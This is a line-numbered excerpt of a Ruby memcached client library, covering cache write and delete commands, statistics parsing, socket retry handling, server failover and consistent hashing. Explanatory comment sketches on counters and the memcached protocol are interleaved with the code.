| end 425 | 426 | result 427 | end 428 | end 429 | end 430 | 431 | ## 432 | # Add +key+ to the cache with value +value+ that expires in +expiry+ 433 | # seconds, but only if +key+ does not already exist in the cache. 434 | # If +raw+ is true, +value+ will not be Marshalled. 435 | # 436 | # Readers should call this method in the event of a cache miss, not 437 | # MemCache#set. 
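#
# Counter sketch for the write paths above: memcached can only incr/decr
# values stored as plain ASCII integers, so counters should be written with
# raw = true instead of letting the client Marshal them:
#
#   cache.set 'hits', '10', 0, true   # stored literally as "10"
#   cache.incr 'hits'                 # => 11
#   cache.decr 'hits', 5              # => 6
#   cache.get 'hits', true            # => [0, "6"]
#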
438 | 439 | def add(key, value, expiry = 0, raw = false) 440 | raise MemCacheError, "Update of readonly cache" if @readonly 441 | value = Marshal.dump value unless raw 442 | with_server(key) do |server, cache_key| 443 | logger.debug { "add #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 444 | command = "add #{cache_key} 0 #{expiry} #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 445 | 446 | with_socket_management(server) do |socket| 447 | socket.write command 448 | break nil if @no_reply 449 | result = socket.gets 450 | raise_on_error_response! result 451 | result 452 | end 453 | end 454 | end 455 | 456 | ## 457 | # Add +key+ to the cache with value +value+ that expires in +expiry+ 458 | # seconds, but only if +key+ already exists in the cache. 459 | # If +raw+ is true, +value+ will not be Marshalled. 460 | def replace(key, value, expiry = 0, raw = false) 461 | raise MemCacheError, "Update of readonly cache" if @readonly 462 | value = Marshal.dump value unless raw 463 | with_server(key) do |server, cache_key| 464 | logger.debug { "replace #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 465 | command = "replace #{cache_key} 0 #{expiry} #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 466 | 467 | with_socket_management(server) do |socket| 468 | socket.write command 469 | break nil if @no_reply 470 | result = socket.gets 471 | raise_on_error_response! result 472 | result 473 | end 474 | end 475 | end 476 | 477 | ## 478 | # Append - 'add this data to an existing key after existing data' 479 | # Please note the value is always passed to memcached as raw since it 480 | # doesn't make a lot of sense to concatenate marshalled data together. 481 | def append(key, value) 482 | raise MemCacheError, "Update of readonly cache" if @readonly 483 | with_server(key) do |server, cache_key| 484 | logger.debug { "append #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 485 | command = "append #{cache_key} 0 0 #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 486 | 487 | with_socket_management(server) do |socket| 488 | socket.write command 489 | break nil if @no_reply 490 | result = socket.gets 491 | raise_on_error_response! result 492 | result 493 | end 494 | end 495 | end 496 | 497 | ## 498 | # Prepend - 'add this data to an existing key before existing data' 499 | # Please note the value is always passed to memcached as raw since it 500 | # doesn't make a lot of sense to concatenate marshalled data together. 501 | def prepend(key, value) 502 | raise MemCacheError, "Update of readonly cache" if @readonly 503 | with_server(key) do |server, cache_key| 504 | logger.debug { "prepend #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 505 | command = "prepend #{cache_key} 0 0 #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 506 | 507 | with_socket_management(server) do |socket| 508 | socket.write command 509 | break nil if @no_reply 510 | result = socket.gets 511 | raise_on_error_response! result 512 | result 513 | end 514 | end 515 | end 516 | 517 | ## 518 | # Removes +key+ from the cache. 519 | # +expiry+ is ignored as it has been removed from the latest memcached version. 
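#
# Sketch of the conditional and concatenating writes above (raw storage is
# used so the appended bytes stay meaningful; return values assume
# :no_reply is false, so the raw memcached response line is returned):
#
#   cache.add     'motd', 'hello', 0, true   # => "STORED\r\n"      (key was absent)
#   cache.add     'motd', 'later', 0, true   # => "NOT_STORED\r\n"  (key already present)
#   cache.replace 'motd', 'bye',   0, true   # => "STORED\r\n"      (key must already exist)
#   cache.append  'motd', '!!'               # value is now "bye!!"
#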
520 | 521 | def delete(key, expiry = 0) 522 | raise MemCacheError, "Update of readonly cache" if @readonly 523 | with_server(key) do |server, cache_key| 524 | with_socket_management(server) do |socket| 525 | logger.debug { "delete #{cache_key} on #{server}" } if logger 526 | socket.write "delete #{cache_key}#{noreply}\r\n" 527 | break nil if @no_reply 528 | result = socket.gets 529 | raise_on_error_response! result 530 | result 531 | end 532 | end 533 | end 534 | 535 | ## 536 | # Flush the cache from all memcache servers. 537 | # A non-zero value for +delay+ will ensure that the flush 538 | # is propogated slowly through your memcached server farm. 539 | # The Nth server will be flushed N*delay seconds from now, 540 | # asynchronously so this method returns quickly. 541 | # This prevents a huge database spike due to a total 542 | # flush all at once. 543 | 544 | def flush_all(delay=0) 545 | raise MemCacheError, 'No active servers' unless active? 546 | raise MemCacheError, "Update of readonly cache" if @readonly 547 | 548 | begin 549 | delay_time = 0 550 | @servers.each do |server| 551 | with_socket_management(server) do |socket| 552 | logger.debug { "flush_all #{delay_time} on #{server}" } if logger 553 | if delay == 0 # older versions of memcached will fail silently otherwise 554 | socket.write "flush_all#{noreply}\r\n" 555 | else 556 | socket.write "flush_all #{delay_time}#{noreply}\r\n" 557 | end 558 | break nil if @no_reply 559 | result = socket.gets 560 | raise_on_error_response! result 561 | result 562 | end 563 | delay_time += delay 564 | end 565 | rescue IndexError => err 566 | handle_error nil, err 567 | end 568 | end 569 | 570 | ## 571 | # Reset the connection to all memcache servers. This should be called if 572 | # there is a problem with a cache lookup that might have left the connection 573 | # in a corrupted state. 574 | 575 | def reset 576 | @servers.each { |server| server.close } 577 | end 578 | 579 | ## 580 | # Returns statistics for each memcached server. An explanation of the 581 | # statistics can be found in the memcached docs: 582 | # 583 | # http://code.sixapart.com/svn/memcached/trunk/server/doc/protocol.txt 584 | # 585 | # Example: 586 | # 587 | # >> pp CACHE.stats 588 | # {"localhost:11211"=> 589 | # {"bytes"=>4718, 590 | # "pid"=>20188, 591 | # "connection_structures"=>4, 592 | # "time"=>1162278121, 593 | # "pointer_size"=>32, 594 | # "limit_maxbytes"=>67108864, 595 | # "cmd_get"=>14532, 596 | # "version"=>"1.2.0", 597 | # "bytes_written"=>432583, 598 | # "cmd_set"=>32, 599 | # "get_misses"=>0, 600 | # "total_connections"=>19, 601 | # "curr_connections"=>3, 602 | # "curr_items"=>4, 603 | # "uptime"=>1557, 604 | # "get_hits"=>14532, 605 | # "total_items"=>32, 606 | # "rusage_system"=>0.313952, 607 | # "rusage_user"=>0.119981, 608 | # "bytes_read"=>190619}} 609 | # => nil 610 | 611 | def stats(submenu=nil) 612 | raise MemCacheError, "No active servers" unless active? 613 | server_stats = {} 614 | 615 | @servers.each do |server| 616 | next unless server.alive? 617 | 618 | with_socket_management(server) do |socket| 619 | value = nil 620 | cmd = "stats\r\n" 621 | cmd = "stats "+submenu+"\r\n" if !submenu.nil? and submenu != "" 622 | 623 | socket.write cmd 624 | stats = {} 625 | while line = socket.gets do 626 | raise_on_error_response! 
line 627 | break if line == "END\r\n" 628 | if line =~ /\ASTAT ([\S]+) ([\w\.\:]+)/ then 629 | name, value = $1, $2 630 | stats[name] = case name 631 | when (value.to_i == 0 and value != 0) then 632 | value 633 | when 'rusage_user', 'rusage_system' then 634 | seconds, microseconds = value.split(/:/, 2) 635 | microseconds ||= 0 636 | Float(seconds) + (Float(microseconds) / 1_000_000) 637 | else 638 | if value =~ /\A\d+\Z/ then 639 | value.to_i 640 | else 641 | value 642 | end 643 | end 644 | end 645 | end 646 | server_stats["#{server.host}:#{server.port}"] = stats 647 | end 648 | end 649 | 650 | raise MemCacheError, "No active servers" if server_stats.empty? 651 | server_stats 652 | end 653 | 654 | ## 655 | # Shortcut to get a value from the cache. 656 | 657 | alias [] get 658 | 659 | ## 660 | # Shortcut to save a value in the cache. This method does not set an 661 | # expiration on the entry. Use set to specify an explicit expiry. 662 | 663 | def []=(key, value) 664 | set key, value 665 | end 666 | 667 | protected unless $TESTING 668 | 669 | ## 670 | # Create a key for the cache, incorporating the namespace qualifier if 671 | # requested. 672 | 673 | def make_cache_key(key) 674 | if @autofix_keys && (key =~ /\s/ || key_length(key) > 250) 675 | key = "#{Digest::SHA1.hexdigest(key)}-autofixed" 676 | end 677 | 678 | if namespace.nil? 679 | key 680 | else 681 | "#{@namespace}#{@namespace_separator}#{key}" 682 | end 683 | end 684 | 685 | ## 686 | # Calculate length of the key, including the namespace and namespace-separator. 687 | 688 | def key_length(key) 689 | key.length + (namespace.nil? ? 0 : ( namespace.length + (@namespace_separator.nil? ? 0 : @namespace_separator.length) ) ) 690 | end 691 | 692 | ## 693 | # Returns an interoperable hash value for +key+. (I think, docs are 694 | # sketchy for down servers). 695 | 696 | def hash_for(key) 697 | Zlib.crc32(key) 698 | end 699 | 700 | ## 701 | # Pick a server to handle the request based on a hash of the key. 702 | 703 | def get_server_for_key(key, options = {}) 704 | raise ArgumentError, "illegal character in key #{key.inspect}" if 705 | key =~ /\s/ 706 | raise ArgumentError, "key cannot be blank" if key.nil? || key.strip.size == 0 707 | raise ArgumentError, "key too long #{key.inspect}" if key.length > 250 708 | raise MemCacheError, "No servers available" if @servers.empty? 709 | return @servers.first if @servers.length == 1 710 | 711 | hkey = hash_for(key) 712 | 713 | 20.times do |try| 714 | entryidx = Continuum.binary_search(@continuum, hkey) 715 | server = @continuum[entryidx].server 716 | return server if server.alive? 717 | break unless failover 718 | hkey = hash_for "#{try}#{key}" 719 | end 720 | 721 | raise MemCacheError, "No servers available" 722 | end 723 | 724 | ## 725 | # Performs a raw decr for +cache_key+ from +server+. Returns nil if not 726 | # found. 727 | 728 | def cache_decr(server, cache_key, amount) 729 | with_socket_management(server) do |socket| 730 | socket.write "decr #{cache_key} #{amount}#{noreply}\r\n" 731 | break nil if @no_reply 732 | text = socket.gets 733 | raise_on_error_response! text 734 | return nil if text == "NOT_FOUND\r\n" 735 | return text.to_i 736 | end 737 | end 738 | 739 | ## 740 | # Fetches the raw data for +cache_key+ from +server+. Returns nil on cache 741 | # miss. 742 | 743 | def cache_get(server, cache_key) 744 | with_socket_management(server) do |socket| 745 | socket.write "get #{cache_key}\r\n" 746 | keyline = socket.gets # "VALUE \r\n" 747 | 748 | if keyline.nil? 
then 749 | server.close 750 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 751 | end 752 | 753 | raise_on_error_response! keyline 754 | return nil if keyline == "END\r\n" 755 | 756 | unless keyline =~ /(\d+) (\d+)\r/ then 757 | server.close 758 | raise MemCacheError, "unexpected response #{keyline.inspect}" 759 | end 760 | flags = $1.to_i 761 | value = socket.read $2.to_i 762 | socket.read 2 # "\r\n" 763 | socket.gets # "END\r\n" 764 | return [flags,value] 765 | end 766 | end 767 | 768 | def gets(key, raw = false) 769 | with_server(key) do |server, cache_key| 770 | logger.debug { "gets #{key} from #{server.inspect}" } if logger 771 | result = with_socket_management(server) do |socket| 772 | socket.write "gets #{cache_key}\r\n" 773 | keyline = socket.gets # "VALUE \r\n" 774 | 775 | if keyline.nil? then 776 | server.close 777 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 778 | end 779 | 780 | raise_on_error_response! keyline 781 | return nil if keyline == "END\r\n" 782 | 783 | unless keyline =~ /(\d+) (\w+)\r/ then 784 | server.close 785 | raise MemCacheError, "unexpected response #{keyline.inspect}" 786 | end 787 | value = socket.read $1.to_i 788 | socket.read 2 # "\r\n" 789 | socket.gets # "END\r\n" 790 | [value, $2] 791 | end 792 | result[0] = Marshal.load result[0] unless raw 793 | result 794 | end 795 | rescue TypeError => err 796 | handle_error nil, err 797 | end 798 | 799 | 800 | ## 801 | # Fetches +cache_keys+ from +server+ using a multi-get. 802 | 803 | def cache_get_multi(server, cache_keys) 804 | with_socket_management(server) do |socket| 805 | values = {} 806 | socket.write "get #{cache_keys}\r\n" 807 | 808 | while keyline = socket.gets do 809 | return values if keyline == "END\r\n" 810 | raise_on_error_response! keyline 811 | 812 | unless keyline =~ /\AVALUE (.+) (.+) (.+)/ then 813 | server.close 814 | raise MemCacheError, "unexpected response #{keyline.inspect}" 815 | end 816 | 817 | key, data_length = $1, $3 818 | values[$1] = socket.read data_length.to_i 819 | socket.read(2) # "\r\n" 820 | end 821 | 822 | server.close 823 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" # TODO: retry here too 824 | end 825 | end 826 | 827 | ## 828 | # Performs a raw incr for +cache_key+ from +server+. Returns nil if not 829 | # found. 830 | 831 | def cache_incr(server, cache_key, amount) 832 | with_socket_management(server) do |socket| 833 | socket.write "incr #{cache_key} #{amount}#{noreply}\r\n" 834 | break nil if @no_reply 835 | text = socket.gets 836 | raise_on_error_response! text 837 | return nil if text == "NOT_FOUND\r\n" 838 | return text.to_i 839 | end 840 | end 841 | 842 | ## 843 | # Gets or creates a socket connected to the given server, and yields it 844 | # to the block, wrapped in a mutex synchronization if @multithread is true. 845 | # 846 | # If a socket error (SocketError, SystemCallError, IOError) or protocol error 847 | # (MemCacheError) is raised by the block, closes the socket, attempts to 848 | # connect again, and retries the block (once). If an error is again raised, 849 | # reraises it as MemCacheError. 850 | # 851 | # If unable to connect to the server (or if in the reconnect wait period), 852 | # raises MemCacheError. Note that the socket connect code marks a server 853 | # dead for a timeout period, so retrying does not apply to connection attempt 854 | # failures (but does still apply to unexpectedly lost connections etc.). 
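#
# For reference, the ASCII-protocol exchange parsed by cache_get and gets
# above looks roughly like this (flags and byte count on the VALUE line,
# then the data block, then END):
#
#   client: get app:greeting\r\n
#   server: VALUE app:greeting 0 10\r\n
#           <10 bytes of data>\r\n
#           END\r\n
#
# gets additionally returns a CAS token at the end of the VALUE line, which
# #cas sends back with its update so stale writes are rejected.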
855 | 856 | def with_socket_management(server, &block) 857 | check_multithread_status! 858 | 859 | @mutex.lock if @multithread 860 | retried = false 861 | 862 | begin 863 | socket = server.socket 864 | 865 | # Raise an IndexError to show this server is out of whack. If were inside 866 | # a with_server block, we'll catch it and attempt to restart the operation. 867 | 868 | raise IndexError, "No connection to server (#{server.status})" if socket.nil? 869 | 870 | block.call(socket) 871 | 872 | rescue SocketError, Errno::EAGAIN, Timeout::Error => err 873 | logger.warn { "Socket failure: #{err.message}" } if logger 874 | server.mark_dead(err) 875 | handle_error(server, err) 876 | 877 | rescue MemCacheError, SystemCallError, IOError => err 878 | logger.warn { "Generic failure: #{err.class.name}: #{err.message}" } if logger 879 | handle_error(server, err) if retried || socket.nil? 880 | retried = true 881 | retry 882 | end 883 | ensure 884 | @mutex.unlock if @multithread 885 | end 886 | 887 | def with_server(key) 888 | retried = false 889 | begin 890 | server, cache_key = request_setup(key) 891 | yield server, cache_key 892 | rescue IndexError => e 893 | logger.warn { "Server failed: #{e.class.name}: #{e.message}" } if logger 894 | if !retried && @servers.size > 1 895 | logger.info { "Connection to server #{server.inspect} DIED! Retrying operation..." } if logger 896 | retried = true 897 | retry 898 | end 899 | handle_error(nil, e) 900 | end 901 | end 902 | 903 | ## 904 | # Handles +error+ from +server+. 905 | 906 | def handle_error(server, error) 907 | raise error if error.is_a?(MemCacheError) 908 | server.close if server && server.status == "CONNECTED" 909 | new_error = MemCacheError.new error.message 910 | new_error.set_backtrace error.backtrace 911 | raise new_error 912 | end 913 | 914 | def noreply 915 | @no_reply ? ' noreply' : '' 916 | end 917 | 918 | ## 919 | # Performs setup for making a request with +key+ from memcached. Returns 920 | # the server to fetch the key from and the complete key to use. 921 | 922 | def request_setup(key) 923 | raise MemCacheError, 'No active servers' unless active? 924 | cache_key = make_cache_key key 925 | server = get_server_for_key cache_key 926 | return server, cache_key 927 | end 928 | 929 | def raise_on_error_response!(response) 930 | if response =~ /\A(?:CLIENT_|SERVER_)?ERROR(.*)/ 931 | raise MemCacheError, $1.strip 932 | end 933 | end 934 | 935 | def create_continuum_for(servers) 936 | total_weight = servers.inject(0) { |memo, srv| memo + srv.weight } 937 | continuum = [] 938 | 939 | servers.each do |server| 940 | entry_count_for(server, servers.size, total_weight).times do |idx| 941 | hash = Digest::SHA1.hexdigest("#{server.host}:#{server.port}:#{idx}") 942 | value = Integer("0x#{hash[0..7]}") 943 | continuum << Continuum::Entry.new(value, server) 944 | end 945 | end 946 | 947 | continuum.sort { |a, b| a.value <=> b.value } 948 | end 949 | 950 | def entry_count_for(server, total_servers, total_weight) 951 | ((total_servers * Continuum::POINTS_PER_SERVER * server.weight) / Float(total_weight)).floor 952 | end 953 | 954 | def check_multithread_status! 955 | return if @multithread 956 | return if @evented 957 | 958 | if Thread.current[:memcache_client] != self.object_id 959 | raise MemCacheError, <<-EOM 960 | You are accessing this memcache-client instance from multiple threads but have not enabled multithread support. 
961 |         Normally:  MemCache.new(['localhost:11211'], :multithread => true)
962 |         In Rails:  config.cache_store = [:mem_cache_store, 'localhost:11211', { :multithread => true }]
963 |       EOM
964 |     end
965 |   end
966 | 
967 |   ##
968 |   # This class represents a memcached server instance.
969 | 
970 |   class Server
971 | 
972 |     ##
973 |     # The amount of time to wait before attempting to re-establish a
974 |     # connection with a server that is marked dead.
975 | 
976 |     RETRY_DELAY = 30.0
977 | 
978 |     ##
979 |     # The host the memcached server is running on.
980 | 
981 |     attr_reader :host
982 | 
983 |     ##
984 |     # The port the memcached server is listening on.
985 | 
986 |     attr_reader :port
987 | 
988 |     ##
989 |     # The weight given to the server.
990 | 
991 |     attr_reader :weight
992 | 
993 |     ##
994 |     # The time of next retry if the connection is dead.
995 | 
996 |     attr_reader :retry
997 | 
998 |     ##
999 |     # A text status string describing the state of the server.
1000 | 
1001 |     attr_reader :status
1002 | 
1003 |     attr_reader :logger
1004 | 
1005 |     ##
1006 |     # Create a new MemCache::Server object for the memcached instance
1007 |     # listening on the given host and port, weighted by the given weight.
1008 | 
1009 |     def initialize(memcache, host, port = DEFAULT_PORT, weight = DEFAULT_WEIGHT)
1010 |       raise ArgumentError, "No host specified" if host.nil? or host.empty?
1011 |       raise ArgumentError, "No port specified" if port.nil? or port.to_i.zero?
1012 | 
1013 |       @host   = host
1014 |       @port   = port.to_i
1015 |       @weight = weight.to_i
1016 | 
1017 |       @sock   = nil
1018 |       @retry  = nil
1019 |       @status = 'NOT CONNECTED'
1020 |       @timeout = memcache.timeout
1021 |       @logger  = memcache.logger
1022 | 
1023 |       self.extend(MemCache::EventedServer) if defined?(EM) and EM.reactor_running?
1024 |     end
1025 | 
1026 |     ##
1027 |     # Return a string representation of the server object.
1028 | 
1029 |     def inspect
1030 |       "<MemCache::Server: %s:%d [%d] (%s)>" % [@host, @port, @weight, @status]
1031 |     end
1032 | 
1033 |     ##
1034 |     # Check whether the server connection is alive.  This will cause the
1035 |     # socket to attempt to connect if it isn't already connected and/or if
1036 |     # the server was previously marked as down and the retry time has
1037 |     # been exceeded.
1038 | 
1039 |     def alive?
1040 |       !!socket
1041 |     end
1042 | 
1043 |     ##
1044 |     # Try to connect to the memcached server targeted by this object.
1045 |     # Returns the connected socket object on success or nil on failure.
1046 | 
1047 |     def socket
1048 |       return @sock if @sock and not @sock.closed?
1049 | 
1050 |       @sock = nil
1051 | 
1052 |       # If the host was dead, don't retry for a while.
1053 |       return if @retry and @retry > Time.now
1054 | 
1055 |       # Attempt to connect if not already connected.
1056 | begin 1057 | @sock = connect_to(@host, @port, @timeout) 1058 | @sock.setsockopt Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1 1059 | @retry = nil 1060 | @status = 'CONNECTED' 1061 | rescue SocketError, SystemCallError, IOError, Timeout::Error => err 1062 | logger.warn { "Unable to open socket: #{err.class.name}, #{err.message}" } if logger 1063 | mark_dead err 1064 | end 1065 | 1066 | return @sock 1067 | end 1068 | 1069 | def connect_to(host, port, timeout=nil) 1070 | sock = nil 1071 | if timeout 1072 | MemCacheTimer.timeout(timeout) do 1073 | sock = TCPSocket.new(host, port) 1074 | end 1075 | else 1076 | sock = TCPSocket.new(host, port) 1077 | end 1078 | 1079 | io = MemCache::BufferedIO.new(sock) 1080 | io.read_timeout = timeout 1081 | # Getting reports from several customers, including 37signals, 1082 | # that the non-blocking timeouts in 1.7.5 don't seem to be reliable. 1083 | # It can't hurt to set the underlying socket timeout also, if possible. 1084 | if timeout 1085 | secs = Integer(timeout) 1086 | usecs = Integer((timeout - secs) * 1_000_000) 1087 | optval = [secs, usecs].pack("l_2") 1088 | begin 1089 | io.setsockopt Socket::SOL_SOCKET, Socket::SO_RCVTIMEO, optval 1090 | io.setsockopt Socket::SOL_SOCKET, Socket::SO_SNDTIMEO, optval 1091 | rescue Exception => ex 1092 | # Solaris, for one, does not like/support socket timeouts. 1093 | @logger.info "[memcache-client] Unable to use raw socket timeouts: #{ex.class.name}: #{ex.message}" if @logger 1094 | end 1095 | end 1096 | io 1097 | end 1098 | 1099 | ## 1100 | # Close the connection to the memcached server targeted by this 1101 | # object. The server is not considered dead. 1102 | 1103 | def close 1104 | @sock.close if @sock && !@sock.closed? 1105 | @sock = nil 1106 | @retry = nil 1107 | @status = "NOT CONNECTED" 1108 | end 1109 | 1110 | ## 1111 | # Mark the server as dead and close its socket. 1112 | 1113 | def mark_dead(error) 1114 | close 1115 | @retry = Time.now + RETRY_DELAY 1116 | 1117 | reason = "#{error.class.name}: #{error.message}" 1118 | @status = sprintf "%s:%s DEAD (%s), will retry at %s", @host, @port, reason, @retry 1119 | @logger.info { @status } if @logger 1120 | end 1121 | 1122 | end 1123 | 1124 | ## 1125 | # Base MemCache exception class. 
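#
# Sketch of the Server retry behaviour implemented above (+cache+ is an
# existing MemCache instance; the 30-second window comes from RETRY_DELAY):
#
#   server = MemCache::Server.new(cache, 'localhost', 11211)
#   server.alive?   # attempts a TCP connect, true on success
#   server.status   # => "CONNECTED", "NOT CONNECTED", or a "... DEAD ..." message
#   server.close    # drops the socket without marking the server dead
#
# Once mark_dead has run, #socket returns nil until RETRY_DELAY has elapsed,
# so callers fail fast rather than repeatedly hitting a known-dead host.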
1126 | 1127 | class MemCacheError < RuntimeError; end 1128 | 1129 | class BufferedIO < Net::BufferedIO # :nodoc: 1130 | BUFSIZE = 1024 * 16 1131 | 1132 | if RUBY_VERSION < '1.9.1' 1133 | def rbuf_fill 1134 | begin 1135 | @rbuf << @io.read_nonblock(BUFSIZE) 1136 | rescue Errno::EWOULDBLOCK 1137 | retry unless @read_timeout 1138 | if IO.select([@io], nil, nil, @read_timeout) 1139 | retry 1140 | else 1141 | raise Timeout::Error, 'IO timeout' 1142 | end 1143 | end 1144 | end 1145 | end 1146 | 1147 | def setsockopt(*args) 1148 | @io.setsockopt(*args) 1149 | end 1150 | 1151 | def gets 1152 | readuntil("\n") 1153 | end 1154 | end 1155 | 1156 | end 1157 | 1158 | module Continuum 1159 | POINTS_PER_SERVER = 160 # this is the default in libmemcached 1160 | 1161 | # Find the closest index in Continuum with value <= the given value 1162 | def self.binary_search(ary, value, &block) 1163 | upper = ary.size - 1 1164 | lower = 0 1165 | idx = 0 1166 | 1167 | while(lower <= upper) do 1168 | idx = (lower + upper) / 2 1169 | comp = ary[idx].value <=> value 1170 | 1171 | if comp == 0 1172 | return idx 1173 | elsif comp > 0 1174 | upper = idx - 1 1175 | else 1176 | lower = idx + 1 1177 | end 1178 | end 1179 | return upper 1180 | end 1181 | 1182 | class Entry 1183 | attr_reader :value 1184 | attr_reader :server 1185 | 1186 | def initialize(val, srv) 1187 | @value = val 1188 | @server = srv 1189 | end 1190 | 1191 | def inspect 1192 | "<#{value}, #{server.host}:#{server.port}>" 1193 | end 1194 | end 1195 | 1196 | end 1197 | require 'continuum_native' 1198 | --------------------------------------------------------------------------------
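A short sketch of how the Continuum module above performs its consistent-hashing
lookup (the point values and :server_a/:server_b placeholders are made up; in the
client, entries are built by create_continuum_for and the lookup value is
Zlib.crc32 of the cache key):

    entries = [
      Continuum::Entry.new(100, :server_a),
      Continuum::Entry.new(500, :server_b),
      Continuum::Entry.new(900, :server_a),
    ]

    idx = Continuum.binary_search(entries, 600)
    entries[idx].server   # => :server_b (closest point with value <= 600)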